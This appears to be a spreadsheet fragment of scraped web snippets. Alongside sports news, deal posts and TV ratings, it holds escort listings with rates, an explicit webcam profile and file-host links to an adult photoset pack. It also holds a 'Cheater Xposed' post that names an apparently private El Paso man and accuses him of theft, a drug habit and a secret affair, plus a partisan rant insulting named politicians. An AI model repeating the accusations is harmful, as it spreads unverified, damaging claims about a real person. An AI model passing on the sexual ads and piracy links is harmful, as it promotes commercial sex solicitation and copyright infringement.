Bonita Location: Bednall Head (ST17 0) Nationality: English Spoken Language: English, Bulgarian Age: 28 years old Weight: 52.7kg (116lb) (8st - 4lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 38 Hair Leigh: Very Short Hair Color: Driftwood Lights Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: No Drinking: No Availability Area: Bednall Head Outcall: Staffordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Bonita Escort Name: Iris Location: Bednall Head (ST17 0) Nationality: Welsh Spoken Language: English, Arabic Age: 18 years old Weight: 47.3kg (104lb) (7st - 6lb) Height: 6 feet 1 inches (185.45cm) Dress Size: M Shoe Size: 38 Hair Leigh: Very Long Hair Color: Brunette Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Bednall Head Outcall: Staffordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Iris Bednall Head Indian Escort, Bednall Head Indian Escort, Bednall Head Scottish Escort, Bednall Head Gay Escort, Bednall Head Mature Escort, Bednall Head Spanish Escort, Bednall Head French Escort, Bednall Head Black Escort, Bednall Head Irish Escort, Bednall Head Massage Escort, Bednall Head Teen Escort, Bednall Head British Escort, Bednall Head Walsh Escort, Bednall Head Bisexual Escort, Bednall Head Young Escort, Bednall Head Ebony Escort, Bednall Head Independent Escort, Bednall Head Brazilian Escort, Bednall Head Best Escort, Bednall Head Cheap Escort, Bednall Head Porn Escort, Bednall Head Outcall Escort, Bednall Head Asian Escort, Bednall Head Brunette Escort, Bednall Head Male Escort, Bednall Head Blonde Escort, Bednall Head Agency Escort, Bednall Head Polish Escort, Bednall Head Busty Escort, Bednall Head Erotic Escort, Bednall Head Incall Escort, Bednall Head Female Escort, Bednall Head Horny Escort, Bednall Head Chinese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Bednall Head appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>If you’re the sort of person who reads this blog, then the thought of the XKCD author, Randall Munroe coming to London probably made you let out a little squeak of excitement. He’s giving a 90-minute talk at the Southbank Centre in October, were you will be invited into his mind-bending and entertaining world, where cutting-edge science meets the things we do everyday. Drawing on the cartoons in How To, Munroe shows us highly impractical advice for everything from landing a plane to digging a hole. He offers tips for taking a selfie with a telescope, crossing a river by boiling it, and getting to your appointments on time by destroying the moon. In a London exclusive, the creator of xkcd and the books What If? and Thing Explainer presents his latest book of comics, How To. The talk takes place on Monday 7th October at 7:30pm. Tickets cost £15, £25 and £35 plus a £3 booking fee and are available here. Copies of Randall Munroe’s new book, How To (RRP £16.99) are available for £12.99 when you buy a ticket to the talk. These may be collected at the event. — Munroe was born in Easton, Pennsylvania, and grew up outside Richmond, Virginia. After studying physics at Christopher Newport University, he got a job building robots at NASA Langley Research Center. In 2006, he left NASA to draw comics on the internet full time, and has since been nominated for a Hugo Award three times. The International Astronomical Union recently named an asteroid after him: asteroid 4942 Munroe is big enough to cause mass extinction if it ever hits a planet like Earth.</t>
  </si>
  <si>
    <t>Product Name: Done-for-you, Amazing Content Pack! Click here to get Done-for-you, Amazing Content Pack! at discounted price while it’s still available… All orders are protected […] The post Done-for-you, Amazing Content Pack! appeared first on Sell Me Something. Source link</t>
  </si>
  <si>
    <t>[High Praise! to Turning Point USA] [title reference link] 1 0</t>
  </si>
  <si>
    <t>If you have a busy life, getting on top of your laundry is not easy. Between washing, drying and of course, ironing, it’s enough to take up an entire Sunday afternoon.</t>
  </si>
  <si>
    <t>Gooner Mac</t>
  </si>
  <si>
    <t>Arsenal are increasingly confident of signing Kieran Tierney and are edging closer to agreeing a deal with Celtic, according to Sky Sports News.</t>
  </si>
  <si>
    <t>9829 Wednesday 24th July MUM’S THE WORD FOR GEMMA Jane from Radio Weatherfield interviews Gemma and...</t>
  </si>
  <si>
    <t>Birmingham: Deluxe/Executive Room for Two with Breakfast, Bubbly, Late Check-Out and Optional Dinner at 4* Clayton Hotel The post Birmingham: Deluxe/Executive Room for Two with Breakfast, Bubbly, Late Check-Out and Optional Dinner at 4* Clayton Hotel appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Aaron Gillard</t>
  </si>
  <si>
    <t>Daniil Kvyat says his remarkable performance in the mixed conditions during the German Grand Prix shows that he has matured since his previous stint in Formula 1. Kvyat in the Toro Rosso Honda performed achieved the team’s first ever podium in the sport since Sebastian Vettel‘s win at the 2008 Italian Grand Prix. The Russian and the team gambled on the dry tyres in the late stages of the Grand Prix, benefiting when the rest of the field made their switch after the safety car, which put Kvyat and Racing Point‘s Lance Stroll in a strong position. The two drivers were in contention for a podium position, with Kvyat passing Stroll for second before one final safety car came out. Kvyat lost second place to Vettel, but maintained third to grab his first podium in F1 since the 2016 Chinese Grand Prix. Kvyat says his return to the podium feels incredible and thanks the team for their performance over the weekend which led to the team’s first podium in 11 years. “It’s incredible to be back on the podium in what could be called my ‘second career’,” said Kvyat. “I thought it would never happen again in my life, so I’m so incredibly happy. “There’s so many emotions I still need some time to let it all sink in! This achievement is so great for us since it’s 11 years since Toro Rosso’s last podium with Sebastian in Monza. It was such an amazing day and I’m so happy. “Thank you to everyone in the team, it was just an incredible day. I was readier than ever to fight for this kind of position.“ The result marks Kvyat’s best result at the team in his return to F1, after missing the 2018 season having previously been dropped by Red Bull. The Russian raced with Red Bull Racing for 2015 and for four races in 2016, before he was dropped in favour of German Grand Prix winner Max Verstappen. Kvyat struggled with the switch for the remainder of 2016 and 2017, which eventually led to him being dropped from the programme completely at the end of 2017, only to return to the Toro Rosso team for the 2019 season. The twenty-five year old’s weekend got better as before the race, Kvyat became a father as his girlfriend Kelly Piquet, daughter of three-time F1 world champion Nelson Piquet, gave birth to their first child. Kvyat stated at the beginning of the year that his year away from the sport allowed him to mature and cool his head, which he believes today proved that his maturity has grown since his previous stint in the sport. He also spoke about the strategy call that led to his podium success, saying the call was 50/50 to do it a lap earlier, but the called proved to be right. “This year I feel more mature, my head is cooler, and I’m readier to fight on top, so I think I proved that today to myself and everyone around here. I hope this will become a habit soon! “These kinds of races aren’t easy, it was a tough call to pit that lap earlier, but it’s a 50/50 call between the team and me, we win and lose together and today we won together.”</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/27U0DO1S1PU/dish-charlie-ergen-is-key-to-t-mobiles-sprint-takeover-2019-7 T-Mobile’s John Legere called Dish CEO Charlie Ergen in May to save its proposed $26.5 billion takeover of Sprint, according to report On Friday, the Justice Department cleared a landmark deal to combine T-Mobile and Sprint while Dish will become a fourth US wireless company. According to a new profile published in the Wall Street Journal of Dish’s CEO Charlie Ergen, serious talks between the three companies started in May and continued through June. The Department of Justice then spent three weeks asking for better terms. Dish will face challenges in building out a wireless business that can rival AT&amp;T, Verizon and a combined T-Mobile and Sprint company. Ergen has clashed with networks over programming fees for Dish’s pay-TV service, is a notoriously frugal executive, and has compared how he makes business decisions to “Indiana Jones” movies. Visit Business Insider’s homepage to read more stories. On Friday, the Justice Department cleared T-Mobile’s $26.5 billion acquisition of Sprint, eliminating a big hurdle in the telecom’s proposed takeover to combine both companies. The long-desired deal has prompted concerns that T-Mobile and Sprint will operate as a monopoly in the telecom space with only AT&amp;T and Verizon as competitors. As a result, AT&amp;T and Sprint have agreed to sell off portions of their business to pay-TV operator Dish to create a fourth major wireless player. Under the conditions agreed on by the companies, Dish is required to build out a 5G network that covers 20% of the US by 2022 and will span to 70% by 2023. If Dish is unable to do so, the company will owe the U.S. Treasury $2.2 billion. Dish will receive nine million of Sprint’s prepaid customers, licensing rights in rural areas, and access to T-Mobile’s network for seven years while it builds its own national network. Read more: The Justice Department just approved T-Mobile’s $26.5 billion Sprint takeover. Here are the big winners and losers. At the helm of Dish is CEO Charlie Ergen, who plays a critical role in making T-Mobile’s acquisition successful. Ergen has long been a critic of T-Mobile’s mega-deal but things took a turn when T-Mobile’s CEO John Legere called Ergen in late May in need of help, according to a new Wall Street Journal profile. According to an interview with Ergen, Legere told him in May that the “Justice has said that we need a fourth carrier. We should talk if you are interested.” Ergen negotiated with Legere and Sprint chairman Marcelo Claure throughout June. The Justice Department then asked for better terms for three weeks, the Journal reported. Ergen is a former professional poker player who compares how he makes business decisions to “Indiana Jones” movies because “the hero narrowly dodges a never ending string of lethal threats,” reports the Journal. With its pay-TV service, Dish has fought with networks like HBO and Disney over programming fees, causing blackouts for subscribers including the last season of “Game of Thrones.” The profile also suggests that Ergen isn’t as frugal today as he famously was in the past. For example, he’s stopped requiring executives to share hotel rooms and now flies in a private jet, sources told the Journal. Dish has a tough road ahead to compete with Verizon and AT&amp;T While Dish will acquire nine million Sprint customers to kickstart its wireless business, it faces challenges in building a wireless business that can rival AT&amp;T, Verizon, and the combined T-Mobile and Sprint. Verizon and AT&amp;T have 200 million subscribers, and the combined T-Mobile and Sprint company would have more than 80 million subscribers. The companies have spent decades acquiring customers and building wireless connections to cover the US, and are racing to roll out 5G technology. Specifically, Ergen said that Dish will focus on offering on-demand pricing and target businesses like automakers with 5G. “With four, there’s always somebody that will be a rabble rouser,” Ergen told the Journal in the interview. “Somebody will say I don’t have enough market share. I’ve only got nine million subs and want 10 million. That person is going to be more aggressive. The guy who’s got 100 million, he’s just going to hope he holds onto them.” Join the conversation about this story » NOW WATCH: Burger King’s CMO explains why the biggest risk in marketing is not taking one Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/27U0DO1S1PU/dish-charlie-ergen-is-key-to-t-mobiles-sprint-takeover-2019-7 The post T-Mobile’s John Legere called Dish CEO Charlie Ergen in May to save its proposed $26.5 billion takeover of Sprint, according to report appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Agosto 20 – Globalfest 2019 Alberta’s Most Explosive Festival Organizado por Diaryo Alberta Elliston Park 1827 68 St. S.E., Calgary Martes, 20 de agosto de 2019 de 18:00 a 23:00 International Fireworks CULTURAL PAVILIONS including “The PHILIPPINES ETHNIC FOOD Booths including ” Philippine Cuisine” Performance Stages with “Philippine “CULTURAL” Presentations The post Agosto 15-17-20 &amp; 22 – Globalfest 2019 Alberta’s Most Explosive Festival appeared first on Latinos en Alberta.</t>
  </si>
  <si>
    <t>My Kinks: Squirt for you ,pis ,cumm,suck,analMmmmm deliciou Webcam profile: Im very hot and wet whit my pussy i need you dick and i got cum veey much Favourite sex position: What I do in my amateur show: What I don’t like: Gallery</t>
  </si>
  <si>
    <t>B3i, a consortium startup working to use blockchain tech in the insurance industry, has launched its first product on R3’s Corda platform. Revealed Wednesday, the release of B3i’s v1.0 of its Property Catastrophe Excess of Loss Reinsurance product comes a year after the firm’s announcement that it would use Corda to build its future products. The new Cat XoL product is aimed to bring greater speed and lower cost to the market, allowing insurers, brokers and reinsurers to “interact, negotiate and place risk more securely and efficiently.” The firm said: “The B3i Cat XoL product is a ‘first of its kind’ proposition which provides a market wide, integrated network of B3i V1.0 nodes. Integrating brokers with insurers and reinsurers, this provides the participants with a dedicated infrastructure for risk transfer execution, where data is not only exchanged but also notarised and certified.” The product removes the need for some of the manual and time-consuming tasks from the process of renewing an insurance treaty. It also ensures only relevant parties are given real-time access to the contract terms and conditions, offerings and signatures, removing the “contract uncertainty” that afflicts the current manual process, explained the firm. Operational risk is also said to be reduced thanks to the elimination of manual errors such as double entries of data. B3i said it has “worked with the market” to develop the product. Sylvain De Crom, B3i’s chief product officer, said: “B3i is shipping its first application and this is our first opportunity to share with the wider market, not only the Cat XoL application, but also the wider infrastructure we have built to date. The importance of this release is fundamental in delivering to the insurance market the ability for seamless negotiation, efficient placement and contract certainty on a distributed platform that allows parties to retain ownership of their data.” The firm’s CEO, John Carolin – who was appointed in July – added: “This is a pivotal moment for B3i.” In February, the startup quietly raised about $16 million, bringing its total funding to over $22 million, according to corporate registry filings in Switzerland. John Carolin image courtesy of B3i</t>
  </si>
  <si>
    <t>Robert Swan Mueller III, Esquire This morning R.S. Mueller III will walk through the halls of The House of Representatives with his left hand in his pants pocket, doing his best Gary Cooper. Immediately behind him bearing copies of his $45 million report will be his top lieutenants, Andrew Weissman of the Enron scandal prosecution that destroyed the premier Arthur Anderson LLP, top accounting putting 85,000 innocent people on the street only to have the decision overturned unanimously, 9 - 0, by the US Supreme Court with no restitution. Attorney Weissman will be flanked by Jeannie Rhee, long of the US Justice Dept. and like Weissman a five figure donor to the Clinton campaign and defended Hillary in a lawsuit regarding her illegal server, for which she has never faced justice. 16 of the 19 lawyers on the Mueller team were registered Democrat "heavy duty" donors. This will surely go down as one of the greatest TV viewing days in history, while Bob Mueller does a stolid act flanked by his two co-conspirators to find pages from which he will read answers having declared "The report is my testimony!" Jerold Nadler will turn purple as Republican committee members pick over the Mueller carcass with the skill of a flock of California vultures. We will see Representative Nadler slowly catch on that he is being remdered in the halls of Congress and TV around the world going into the history books as a Top Elected Idiot, beating Hank Johnson and Shiela Jackson Lee who regularly expose themselves while making speeches in the hallowed House hall as members speculate on the name of the town in Georgia or Texas that is missing a village idiot today. They certainly picked an interesting way to get rid of them: Elect them to Congress where they can spend our money! Between the disasters of Democrat debates and the antics of top Democrat Joe Biden poking his nose into ladies' hair and groping Highway Patrolmen we can only wonder where the "Democratic" Party is going as it is neither "Democratic" or a party. Members have nothing to say about how it is run, nor is it a political party as no real party says "No!" to everything while lavishing other people's money on illegal aliens, drug purveyors, child abusers and convicted felons ever in search of more votes for the Nadlers, Pelosis, Schumers, Johnsons and Lees of the national swamp as the money of George Soros and Tom Steyer, or anyone who will kick back to "our democracy," the code-word for "the party." Watching the Democrat Party is like a movie of the Titanic passing into the night on a date with an iceberg. It is doomed and the people are catching on that elected folks are insincere, incompetent and insane. Where Democrats arose from the ashes of the Civil War, to keep the American Negro duped into thinking they were their friends, started wars for "fun and profit" to "spread democracy to the world," a fraud in the utterance, as no nation can arrange to have every adult citizen vote on every issue as the definition requires. It is a fraud in the saying alone! These are people who believe in the concentration of power, not the intelligent control and dissemination of it, but at last the people are catching on. Adrian Vance</t>
  </si>
  <si>
    <t>Jessica Hinchliffe</t>
  </si>
  <si>
    <t>An endangered marsupial — known for mating itself to death — disappears from one of its most prominent Queensland habitats.</t>
  </si>
  <si>
    <t>A Szechuan pavlova, cooked by a young Lebanese-Australian woman, who was named winner by three middle-aged white men: name a combination that better sums up contemporary Australia, writes Jack Gow.</t>
  </si>
  <si>
    <t>NuDolls | 2007 | Photoset + Video | 2,24 Gb rapidgator:ND.2007.10.25.Marina.Pure.Beauty.rar uploaded:ND.2007.10.25.Marina.Pure.Beauty.rar katfile:ND.2007.10.25.Marina.Pure.Beauty.rar mexashare:ND.2007.10.25.Marina.Pure.Beauty.rar filefox:ND.2007.10.25.Marina.Pure.Beauty.rar rapidgator:ND.2007.10.29.Julia.White.Foam.rar uploaded:ND.2007.10.29.Julia.White.Foam.rar katfile:ND.2007.10.29.Julia.White.Foam.rar mexashare:ND.2007.10.29.Julia.White.Foam.rar filefox:ND.2007.10.29.Julia.White.Foam.rar rapidgator:ND.2007.10.31.Viktoria.The.Cup.Of.Tea.rar uploaded:ND.2007.10.31.Viktoria.The.Cup.Of.Tea.rar katfile:ND.2007.10.31.Viktoria.The.Cup.Of.Tea.rar mexashare:ND.2007.10.31.Viktoria.The.Cup.Of.Tea.rar filefox:ND.2007.10.31.Viktoria.The.Cup.Of.Tea.rar rapidgator:ND.2007.11.02.Alexandra.Extra.Hot.rar uploaded:ND.2007.11.02.Alexandra.Extra.Hot.rar katfile:ND.2007.11.02.Alexandra.Extra.Hot.rar mexashare:ND.2007.11.02.Alexandra.Extra.Hot.rar filefox:ND.2007.11.02.Alexandra.Extra.Hot.rar rapidgator:ND.2007.11.06.Julia.Mischievous.Girl.rar uploaded:ND.2007.11.06.Julia.Mischievous.Girl.rar katfile:ND.2007.11.06.Julia.Mischievous.Girl.rar mexashare:ND.2007.11.06.Julia.Mischievous.Girl.rar filefox:ND.2007.11.06.Julia.Mischievous.Girl.rar rapidgator:ND.2007.11.08.Tanya.Lollipop.Taste.rar uploaded:ND.2007.11.08.Tanya.Lollipop.Taste.rar katfile:ND.2007.11.08.Tanya.Lollipop.Taste.rar mexashare:ND.2007.11.08.Tanya.Lollipop.Taste.rar rapidgator:ND.2007.11.12.Natasha.Glaring.Shapes.Of.Body.rar uploaded:ND.2007.11.12.Natasha.Glaring.Shapes.Of.Body.rar katfile:ND.2007.11.12.Natasha.Glaring.Shapes.Of.Body.rar mexashare:ND.2007.11.12.Natasha.Glaring.Shapes.Of.Body.rar filefox:ND.2007.11.12.Natasha.Glaring.Shapes.Of.Body.rar rapidgator:ND.2007.11.14.Viktoriya.Shining.Coquette.rar uploaded:ND.2007.11.14.Viktoriya.Shining.Coquette.rar katfile:ND.2007.11.14.Viktoriya.Shining.Coquette.rar mexashare:ND.2007.11.14.Viktoriya.Shining.Coquette.rar filefox:ND.2007.11.14.Viktoriya.Shining.Coquette.rar rapidgator:ND.2007.11.16.Mariya.Full.Of.Pleasure.rar uploaded:ND.2007.11.16.Mariya.Full.Of.Pleasure.rar katfile:ND.2007.11.16.Mariya.Full.Of.Pleasure.rar mexashare:ND.2007.11.16.Mariya.Full.Of.Pleasure.rar filefox:ND.2007.11.16.Mariya.Full.Of.Pleasure.rar rapidgator:ND.2007.11.20.Nadya.Pure.Angel.rar uploaded:ND.2007.11.20.Nadya.Pure.Angel.rar katfile:ND.2007.11.20.Nadya.Pure.Angel.rar mexashare:ND.2007.11.20.Nadya.Pure.Angel.rar filefox:ND.2007.11.20.Nadya.Pure.Angel.rar rapidgator:ND.2007.11.22.Elena.Sexy.Teacher.rar uploaded:ND.2007.11.22.Elena.Sexy.Teacher.rar katfile:ND.2007.11.22.Elena.Sexy.Teacher.rar filefox:ND.2007.11.22.Elena.Sexy.Teacher.rar rapidgator:ND.2007.11.26.Natasha.Deep.Sexy.Look.rar uploaded:ND.2007.11.26.Natasha.Deep.Sexy.Look.rar katfile:ND.2007.11.26.Natasha.Deep.Sexy.Look.rar filefox:ND.2007.11.26.Natasha.Deep.Sexy.Look.rar rapidgator:ND.2007.11.28.Ksenia.Extreme.Long.Legs.rar uploaded:ND.2007.11.28.Ksenia.Extreme.Long.Legs.rar katfile:ND.2007.11.28.Ksenia.Extreme.Long.Legs.rar mexashare:ND.2007.11.28.Ksenia.Extreme.Long.Legs.rar filefox:ND.2007.11.28.Ksenia.Extreme.Long.Legs.rar rapidgator:ND.2007.11.30.Natasha.Water.Funs.rar uploaded:ND.2007.11.30.Natasha.Water.Funs.rar katfile:ND.2007.11.30.Natasha.Water.Funs.rar mexashare:ND.2007.11.30.Natasha.Water.Funs.rar filefox:ND.2007.11.30.Natasha.Water.Funs.rar title:[NuDolls.Com] Photoset Pack – October / November 2007</t>
  </si>
  <si>
    <t>cdkit3</t>
  </si>
  <si>
    <t>As per the title, base version of the DJI Spark for a great price: Intelligent flight modes Detects clearly patterned surfaces with adequate lighting and diffuse reflectivity High-performance camera Amazing images and stabilized video Powerful propulsion speed and precision control The DJI Spark really is an astonishing piece of technology Unsure if it comes with the remote, as the blurb on Amazon says it does, but I expect it will not at this price. Don't forget CashRewards etc if it applies to this.</t>
  </si>
  <si>
    <t>By finishing seventh at this month’s Formula E Brooklyn, NY, race, Jean-Eric Vergne captured the 2018-19 Series Championship. Source: Sports Business News</t>
  </si>
  <si>
    <t>Christian Walton Completes Blackburn Rovers Transfer WIGAN, ENGLAND – SEPTEMBER 21: Christian Walton of Wigan Athletic looks on during the Sky Bet Championship match between Wigan Athletic and Bristol City at DW Stadium on September 21, 2018 in Wigan, England. (Photo by Alex Livesey – Danehouse/Getty Images) Blackburn Rovers have signed goalkeeper Christian Walton on a season-long loan deal from Brighton &amp; Hove Albion. This contract will see the player stay with the club during the 2019-20 season. Blackburn Rovers Complete Signing of Christian Walton #Rovers are delighted to announce the signing of goalkeeper @Waltz_1 from @OfficialBHAFC on a season-long loan. Read more: https://t.co/shqEqS36UN #WelcomeWalton pic.twitter.com/hVAILD9e7S — Blackburn Rovers (@Rovers) July 23, 2019 Career So Far Throughout his football career, Christian Walton has played for a number of sides but only on temporary loan deals. During a two-year spell with Wigan Athletic, Walton helped the Latics win the Sky Bet League One title in his first term; and helped them avoid relegation from the second tier in his second year. Walton has made only four appearances for the Brighton academy since progressing through their youth ranks; however, the talented shot-stopper has gained plenty of experience outside of the Premier League in recent years. His most successful loan spells occurred at Luton Town (33 games, nine clean sheets) and Wigan Athletic, with whom he made 30 clean sheets from 69 appearances across two years. What This Means For the Future Blackburn are keen to bolster their goalkeeping options after allowing Spaniard David Raya to sign for Brentford. As a result, the Rovers have just one senior goalkeeper, Jayson Leutwiler. In signing Walton, the Lancashire side now have two senior goalkeepers. As a result, boss Tony Mowbray will be gifted with healthy competition for the number one spot with each ‘keeper certain to challenge the other for the starting position. Joining as the Rovers’ fourth venture into the transfer market this summer, Walton joins with a wealth of experience. Walton spent short loan spells with Bury and then Plymouth during the 2015-16 season. The first half of the 2016-17 season he was on loan at Luton Town, starting 33 games, before being recalled by Brighton at the end of January. The talented shot-stopper has also earned international honours with England, represented the Three Lions at Under-19, Under-20 and Under-21 level. The new signing is expected to be part of the Rovers squad that travels to Bury for a pre-season friendly tomorrow night. This post Christian Walton Completes Blackburn Rovers Transfer appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Newcastle United reporters have been full of praise for £40m man Joelinton following our 2-1 win over Hibernian last night – praising his well taken goal AND impressive all round performance. His first appearance was mixed, with him winning a penalty just a few seconds after being on the pitch at Preston, only to then give one away at the other end moments later, however he was outstanding last night. Not only did he score – a goal he took very well with a clever left-footed finish – his general play, awareness, power, pace and trickery was praised by various Newcastle United reporters watching on at Easter Road: Joelinton’s 1st goal for #NUFC pic.twitter.com/uRECYvxZuK— Rob Clothier (@tfRob1892) July 30, 2019 John Anderson (BBC Radio Newcastle) “Joelinton’s been brilliant, with his goal and his all-round play. His hold up play and his awareness has been brilliant. It’s been first class.” Craig Hope (Daily Mail): “Joelinton has been very good. His first touch is excellent, manipulates the ball &amp; moves it into space rather than killing dead. Once he’s got it they can’t get it off him either.” Miles Starforth (Shields Gazette) “Very good half from Joelinton. He’s scored, linked well and been a physical presence up front.“ Lee Ryder (Chronicle) “Looked lively and took his goal well. Will do well providing he gets service like this. Showed some great touches” (Player rating – 8). Paul Fraser (Northern Echo) “A moment of brilliance from Joelinton there. A little flick got him beyond his first man, then he charged and turned in the box. Ended up floored after a challenge, no pen. He looks decent this £40m fella here.” Great to hear! The Brazilian received a standing ovation from the Toon Army as he left the field with 20 minutes left on the clock and rightly so. Let’s hope this is just the start. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>OPINION Newcastle United should not play hardball in their reported talks with Paris St Germain over left-back Stanley N’Soki as it could easily lead to them missing out. Sky Sports reported on Saturday that the Magpies are in talks with the French giants over the 20-year-old flyer but it is believed the clubs are apart in their valuation with PSG wanting £12million. N’Soki isn’. Source</t>
  </si>
  <si>
    <t>Hector Gallegos is a clown from El Paso, TX who believes that marriage should be between a man and a woman? Why? Beats me, since we have been screwing for months and I am man. He came onto me at a bar and things got hot n heavy pretty quick. I took him to meet my parents but he ended up stealing some cash to support his habit so we can’t go back there. I can’t go to his place, since his family is a bunch of super conservative Trump tards which REALLY blows my mind, because LOOK IN THE MIRROR, KID. YOU ARE BROWN. We don’t see each other much any more. He might be the most annoying kid I have ever met, routinely posting about Trump and laughing about how he posts End Game spoilers in public places on social media just to annoy complete strangers. Karma is a bitch, huh buddy? The post Hector Gallegos, El Paso, TX appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Arabic Latvian Dictionary – travel dictionary to translate Arabic to Latvian. Click on the list to show Arabic or Latvian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Latvian Dictionary →</t>
  </si>
  <si>
    <t>The implication of the recent US ban on its companies from dealing with Huawei was not clear, the government says. The post Huawei: Government decision on 5G rollout delayed appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/qAAnXAxeCog/256086-et-deals-50-off-one-year-ipvanish-vpn ET Deals: 20% Off One Year Subscription of IPVanish VPN Looking for an affordable VPN solution that doesn’t skip on features? Right now, IPVanish is offering up a 20 percent discount when you invest in a one-year subscription. This sale ends soon though, so act fast! One Year of IPVanish VPN for $62.31 (List price: $77.99) IPVanish VPN’s service gives you access to over 1,300 servers located in 75 different locations around the world. The company also takes a strong stance on anonymity and will steadfastly work to protect your privacy. No logs are kept of any data sent through the servers, which makes it impossible for the company to disclose your browsing history even if they wanted to. This service also offers 256-bit AES encryption by offering 256-bit AES encryption and up to 10 simultaneous connections can be active for each account. Our sister site, PCMag, reviewed IPVanish VPN and gave it a score of four out of five. Max Eddy, whom tested the service for PCMag, praised the number of servers and the advanced features available from IPVanish VPN. He also found the user interface somewhat clunky and thought the price wasn’t particularly attractive, but the latter of these two factors is mitigated by the current 20 percent off offer. In the interest of full disclosure, we should also note that IPVanish VPN is owned by J2, which is also the parent company that owns PCMag and this wonderful website you are on right now. Normally, one year of IPVanish sells for $77.99, but you won’t need to pay that much. By purchasing this service through the link listed above, your account will be setup to bill annually for just $62.31. Note: Renews at full price. Terms and conditions apply. See the IPVanish for more information. For more great deals, go to TechBargains. Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/qAAnXAxeCog/256086-et-deals-50-off-one-year-ipvanish-vpn The post ET Deals: 20% Off One Year Subscription of IPVanish VPN appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>The Ravens are trying to put in a new offense and will rely on second-year quarterback Lamar Jackson a lot. But one weapon they team will have that’s proven in kicker Justin Tucker. Source: Sports Business News</t>
  </si>
  <si>
    <t>PLAY ENGLISH MACEDONIAN FLASHCARDS FREE Select English or Macedonian, then select your answer to the prompt word from the four options. Have fun 😉 Republished by Blog Post Promoter</t>
  </si>
  <si>
    <t>HT: ROP</t>
  </si>
  <si>
    <t>A pair of anti-vegan protesters have been fined for eating raw squirrels in front of horrified onlookers – including children – at a food market. Read more? Click here</t>
  </si>
  <si>
    <t>Juventus vs Inter Milan: Live Stream And TV Channel For Friendly Clash Juventus take on their Italian rivals Inter Milan this afternoon, and here is how to watch it LIVE. Cristiano Ronaldo and Co take on Antonio Conte’s men in China as both sides gear up for the new Serie A season. Here is how to watch all the action from the clash in Nanjing LIVE in the United Kingdom right now. What TV channel is it on? The International Champions Cup will be shown on Premier Sports in the United Kingdom. Premier 1 is available on channel 412 on Sky or 551 on Virgin Media. Viewers can also stream the action at premiersports.com and don’t need to be a Sky or Virgin Media customer to subscribe. What time is kick-off? The game will begin at 12.30pm UK time on Wednesday afternoon – or 1.30pm for fans in Italy. Nanjing is seven hours ahead of British time, meaning a 7.30pm start local time for the players. When does Serie A begin? The new Italian season will begin on the last weekend of August and is set to conclude on the weekend May 23-24. The fixtures for the new campaign will be released on July 29-30. This post Juventus vs Inter Milan: Live Stream And TV Channel For Friendly Clash appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/otKOJlOXj3I/ Were You Affected by Equifax Data Breach? You Could Have $125 Coming Many, many people were shocked two years ago to learn of the Equifax data breach. This was one of the largest ever breaches and affected millions of individuals with an estimate at one point of nearly 150 million people. If you are one of that very large group of people affected by the 2017 Equifax data breach, you may have some money coming to you. You can submit a claim, file to recover your expenses from trying to protect your identity, or claim a $125 check if you already signed up for credit monitoring because you were worried about the hack…. Read more Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/otKOJlOXj3I/ The post Were You Affected by Equifax Data Breach? You Could Have $125 Coming appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Nearly two years after they stopped being legal tender, 145 million old-style £1 coins are still missing. The post Old £1 coins: 145 million coins still not returned appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Sun screamed "You loser, I'm winning, yes!" in a heated confrontation as the pair left pool deck after Scott joined Mack Horton's protest movement.</t>
  </si>
  <si>
    <t>Australian Survivor was the best entertainment show for the second night in a row at 712,000 last night, and topped the demos. That bettered competitors including Home and Away (569,000 from 7pm) and 7:30 (513,000). But it was a quiet night overall with no show topping the magic million and there is no immunity idol from big guns around the corner. Seven network won Thursday with 30.4% then Nine 24.2%, 10 19.7%, ABC 14.7% and SBS 10.9%. Seven News was #1 for Seven with 976,000 / 916,000. The Chase was 561,000 / 357,000 and The Front Bar (446,000) and in 2 cities was Martin Clunes: Islands of America (153,000). Nine News drew 909,000 / 881,000 for Nine followed by A Current Affair (691,000) and Hot Seat (536,000 / 312,000), Thursday Night NRL was 357,000 in 2 cities. Also in select cities were RBT (165,000), Australian Crime Stories (128,000) and City of Evil (123,000). The Project was 497,000 / 395,000 for 10 then 10 News First (411,000), Celebrity Name Game (247,000) and Law &amp; Order: SVU (217,000). ABC News (611,000), Escape from the City (453,000), Sammy J (270,000), No Offence (172,000), The Drum (165,000) comprised ABC. Humans was just 62,000. The Handmaid’s Tale led SBS at 230,000 then Tour de France and The Great House Revival (both 188,000) and SBS World News (128,000). Floogals on ABC KIDS topped multichannels at 183,000. The Morning Show: 123,000 / 80,000 Today Extra: 93,000 / 53,000 Studio 10: 52,000 / 52,000 / OzTAM Overnights: Thursday 25 July 2019</t>
  </si>
  <si>
